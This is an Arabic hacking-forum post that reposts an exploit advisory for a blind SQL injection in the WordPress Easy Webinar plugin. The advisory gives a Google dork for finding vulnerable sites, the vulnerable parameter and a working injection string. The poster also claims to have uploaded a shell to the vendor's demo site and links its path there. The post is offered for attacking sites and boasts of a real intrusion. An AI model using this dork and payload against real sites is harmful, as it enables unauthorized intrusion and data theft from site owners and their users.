الموضوع: Wordpress Easy Webinar Plugin Blind SQL
عرض مشاركة واحدة
قديم منذ /11-29-2012, 06:37 PM   #1
Mr iNFiNiTi
Creator

الصورة الرمزية Mr iNFiNiTi

Mr iNFiNiTi غير متواجد حالياً

 رقم العضوية : 149
 تاريخ التسجيل : Nov 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : SauDi
 المشاركات : 94
 إهتمامك : Hacking
 النقاط : 23
 قوة التقييم : Mr iNFiNiTi is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي Wordpress Easy Webinar Plugin Blind SQL

كود:
# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability 
# Vendor Homepage: www.easywebinarplugin.com
 
# Date: 10/26/2012
 
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
 
# Tested on: [Linux/Windows 7]
 
#Vulnerable Parameters: wid=
 
 
# Google Dork: allinurl: get-widget.php?wid=
 
##############################################################
Exploit:
 
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]
 
Note: The HTTP response will read 404, but this is false:
 
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x
 
This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).






##############################################################
 
www.areyousecure.net
 
# Shouts to the Belegit crew

شل على موقع الاضافة من رفعي Wordpress Easy Webinar Plugin Blind SQL SnipeR (29).gif

http://demo.easywebinarplugin.com/wp...n/webadmin.php

المصدر: development-point - للمزيد تابع : قسم الثغـرات

Wordpress Easy Webinar Plugin Blind SQL
  رد مع اقتباس
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47